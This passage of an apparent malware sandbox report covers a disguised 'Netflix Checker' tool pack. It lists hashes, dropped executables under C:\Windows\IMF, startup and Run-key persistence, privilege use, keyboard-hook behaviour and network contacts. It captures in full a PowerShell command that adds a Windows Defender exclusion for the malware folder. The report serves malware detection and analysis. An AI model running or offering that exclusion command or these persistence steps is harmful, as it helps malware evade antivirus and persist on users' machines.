| SHA256 | d996973a5abac35c645664dbef937ea7c2aa716108eb58916e5a57226c00cd7b |
| SHA512 | 800cbfc8fc75f3d5af157fc95f0a9ea72306dcb88084e6517319aec20760e997ed3352779e16c63da06fd820ee8af41a62433efe4fa0a856afe32f1d8d4cba50 |
memory/2668-229-0x000000007FA60000-0x000000007FA70000-memory.dmp
memory/1736-232-0x0000000004A50000-0x0000000004A60000-memory.dmp
memory/2668-234-0x0000000007C50000-0x00000000082CA000-memory.dmp
memory/4952-233-0x0000000001570000-0x0000000001580000-memory.dmp
memory/2668-235-0x0000000007600000-0x000000000761A000-memory.dmp
memory/2668-236-0x0000000007680000-0x000000000768A000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/2668-240-0x0000000007880000-0x0000000007916000-memory.dmp
memory/1196-241-0x00000000006C0000-0x00000000006D2000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/2972-244-0x0000000000A80000-0x0000000000A90000-memory.dmp
memory/1196-246-0x0000000004E70000-0x0000000004E80000-memory.dmp
memory/2668-247-0x0000000007830000-0x000000000783E000-memory.dmp
memory/2668-248-0x0000000007940000-0x000000000795A000-memory.dmp
memory/2668-249-0x0000000007920000-0x0000000007928000-memory.dmp
memory/4952-250-0x0000000001570000-0x0000000001580000-memory.dmp
memory/2972-254-0x0000000000A80000-0x0000000000A90000-memory.dmp
memory/1736-255-0x0000000004A50000-0x0000000004A60000-memory.dmp
memory/2972-256-0x0000000000A80000-0x0000000000A90000-memory.dmp
memory/4952-257-0x0000000001570000-0x0000000001580000-memory.dmp
memory/2972-258-0x0000000000A80000-0x0000000000A90000-memory.dmp
memory/1196-259-0x0000000004E70000-0x0000000004E80000-memory.dmp
memory/4952-260-0x0000000001570000-0x0000000001580000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
30s
Max time network
35s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 209.197.3.8:80 | tcp | |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
Files
memory/4904-133-0x0000000000100000-0x0000000000114000-memory.dmp
memory/4904-134-0x0000000005040000-0x00000000055E4000-memory.dmp
memory/4904-135-0x0000000004A90000-0x0000000004B22000-memory.dmp
memory/4904-136-0x0000000004B50000-0x0000000004B5A000-memory.dmp
memory/4904-137-0x0000000004A80000-0x0000000004A90000-memory.dmp
memory/4904-138-0x0000000006060000-0x00000000060DE000-memory.dmp
memory/4904-139-0x0000000004A80000-0x0000000004A90000-memory.dmp
memory/1712-140-0x0000000002BB0000-0x0000000002BE6000-memory.dmp
memory/1712-141-0x0000000005630000-0x0000000005C58000-memory.dmp
memory/1712-142-0x0000000005C60000-0x0000000005C82000-memory.dmp
memory/1712-143-0x0000000005D40000-0x0000000005DA6000-memory.dmp
memory/1712-150-0x0000000005E60000-0x0000000005EC6000-memory.dmp
memory/1712-151-0x0000000002B60000-0x0000000002B70000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ma34tkqd.eb5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1712-144-0x0000000002B60000-0x0000000002B70000-memory.dmp
memory/1712-156-0x00000000064C0000-0x00000000064DE000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/4904-178-0x0000000005CC0000-0x0000000005D36000-memory.dmp
memory/4904-179-0x0000000005CA0000-0x0000000005CBE000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/4260-194-0x0000000000410000-0x0000000000422000-memory.dmp
memory/1712-195-0x0000000002B60000-0x0000000002B70000-memory.dmp
memory/1712-197-0x0000000006A90000-0x0000000006AC2000-memory.dmp
memory/4260-196-0x0000000004E40000-0x0000000004E50000-memory.dmp
memory/1712-198-0x000000006F4B0000-0x000000006F4FC000-memory.dmp
memory/1712-208-0x0000000007490000-0x00000000074AE000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/1712-212-0x0000000007E10000-0x000000000848A000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/1156-213-0x0000000000920000-0x0000000000932000-memory.dmp
memory/1712-214-0x00000000077D0000-0x00000000077EA000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/1712-216-0x0000000007840000-0x000000000784A000-memory.dmp
memory/1156-217-0x00000000051C0000-0x00000000051D0000-memory.dmp
memory/1712-220-0x0000000007A60000-0x0000000007AF6000-memory.dmp
memory/1712-221-0x0000000007A10000-0x0000000007A1E000-memory.dmp
memory/1712-222-0x0000000007B20000-0x0000000007B3A000-memory.dmp
memory/1712-223-0x0000000007B00000-0x0000000007B08000-memory.dmp
memory/4260-226-0x0000000004E40000-0x0000000004E50000-memory.dmp
memory/1156-227-0x00000000051C0000-0x00000000051D0000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
40s
Max time network
47s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\wscadminui.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\wscadminui.exe"
Network
| Country | Destination | Domain | Proto |
| IE | 20.190.159.75:443 | tcp | |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.220.44.20.in-addr.arpa | udp |
| NL | 8.238.177.254:80 | tcp | |
| NL | 8.238.177.254:80 | tcp | |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.103.197.20.in-addr.arpa | udp |
| GB | 51.132.193.105:443 | tcp | |
| US | 8.8.8.8:53 | 177.17.30.184.in-addr.arpa | udp |
Files
Analysis: behavioral22
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
26s
Max time network
35s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 20.189.173.12:443 | tcp |
Files
memory/4920-133-0x0000000000C20000-0x0000000000C34000-memory.dmp
memory/4920-134-0x0000000005C60000-0x0000000006204000-memory.dmp
memory/4920-135-0x00000000055B0000-0x0000000005642000-memory.dmp
memory/4920-136-0x0000000003080000-0x000000000308A000-memory.dmp
memory/4920-137-0x00000000056A0000-0x00000000056B0000-memory.dmp
memory/4920-138-0x0000000006C00000-0x0000000006C7E000-memory.dmp
memory/4920-139-0x00000000056A0000-0x00000000056B0000-memory.dmp
memory/4856-140-0x0000000002300000-0x0000000002336000-memory.dmp
memory/4856-141-0x0000000004CD0000-0x00000000052F8000-memory.dmp
memory/4856-142-0x0000000005340000-0x0000000005362000-memory.dmp
memory/4856-149-0x00000000022F0000-0x0000000002300000-memory.dmp
memory/4856-150-0x00000000022F0000-0x0000000002300000-memory.dmp
memory/4856-148-0x00000000054E0000-0x0000000005546000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_woh0lcsi.vlq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4856-151-0x00000000055C0000-0x0000000005626000-memory.dmp
memory/4856-156-0x0000000005BE0000-0x0000000005BFE000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/4920-178-0x00000000067E0000-0x0000000006856000-memory.dmp
memory/4920-179-0x00000000067C0000-0x00000000067DE000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/2268-194-0x0000000000A70000-0x0000000000A82000-memory.dmp
memory/2268-195-0x0000000005280000-0x0000000005290000-memory.dmp
memory/4856-196-0x00000000022F0000-0x0000000002300000-memory.dmp
memory/4856-197-0x00000000061A0000-0x00000000061D2000-memory.dmp
memory/4856-198-0x00000000700C0000-0x000000007010C000-memory.dmp
memory/4856-209-0x0000000006180000-0x000000000619E000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/4048-213-0x0000000000E70000-0x0000000000E82000-memory.dmp
memory/4856-216-0x0000000007530000-0x0000000007BAA000-memory.dmp
memory/4856-217-0x0000000006EE0000-0x0000000006EFA000-memory.dmp
memory/4856-218-0x000000007FC80000-0x000000007FC90000-memory.dmp
memory/4048-219-0x0000000005580000-0x0000000005590000-memory.dmp
memory/4856-220-0x0000000006F50000-0x0000000006F5A000-memory.dmp
memory/4856-221-0x0000000007160000-0x00000000071F6000-memory.dmp
memory/4856-222-0x0000000007110000-0x000000000711E000-memory.dmp
memory/4856-223-0x0000000007220000-0x000000000723A000-memory.dmp
memory/4856-224-0x0000000007200000-0x0000000007208000-memory.dmp
memory/2268-227-0x0000000005280000-0x0000000005290000-memory.dmp
memory/4048-228-0x0000000005580000-0x0000000005590000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
18s
Max time network
21s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Sh4lltear.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Sh4lltear.exe"
Network
Files
memory/4896-133-0x0000000000600000-0x00000000006EE000-memory.dmp
memory/4896-134-0x00000000053B0000-0x000000000544C000-memory.dmp
memory/4896-135-0x0000000005A00000-0x0000000005FA4000-memory.dmp
memory/4896-136-0x00000000050A0000-0x00000000050B0000-memory.dmp
memory/4896-137-0x00000000050A0000-0x00000000050B0000-memory.dmp
memory/4896-138-0x00000000050A0000-0x00000000050B0000-memory.dmp
memory/4896-140-0x00000000050A0000-0x00000000050B0000-memory.dmp
memory/4896-139-0x00000000050A0000-0x00000000050B0000-memory.dmp
memory/4896-141-0x00000000050A0000-0x00000000050B0000-memory.dmp
memory/4896-142-0x00000000052B0000-0x00000000053B0000-memory.dmp
memory/4896-143-0x00000000054F0000-0x0000000005582000-memory.dmp
memory/4896-144-0x0000000005460000-0x000000000546A000-memory.dmp
memory/4896-145-0x00000000052B0000-0x00000000053B0000-memory.dmp
memory/4896-146-0x0000000005680000-0x00000000056D6000-memory.dmp
memory/4896-147-0x00000000057C0000-0x00000000058A0000-memory.dmp
memory/4896-148-0x00000000050A0000-0x00000000050B0000-memory.dmp
memory/4896-149-0x00000000050A0000-0x00000000050B0000-memory.dmp
memory/4896-150-0x00000000050A0000-0x00000000050B0000-memory.dmp
memory/4896-151-0x00000000050A0000-0x00000000050B0000-memory.dmp
memory/4896-152-0x00000000050A0000-0x00000000050B0000-memory.dmp
memory/4896-153-0x00000000050A0000-0x00000000050B0000-memory.dmp
memory/4896-154-0x00000000050A0000-0x00000000050B0000-memory.dmp
memory/4896-155-0x00000000050A0000-0x00000000050B0000-memory.dmp
memory/4896-156-0x00000000052B0000-0x00000000053B0000-memory.dmp
memory/4896-157-0x00000000052B0000-0x00000000053B0000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
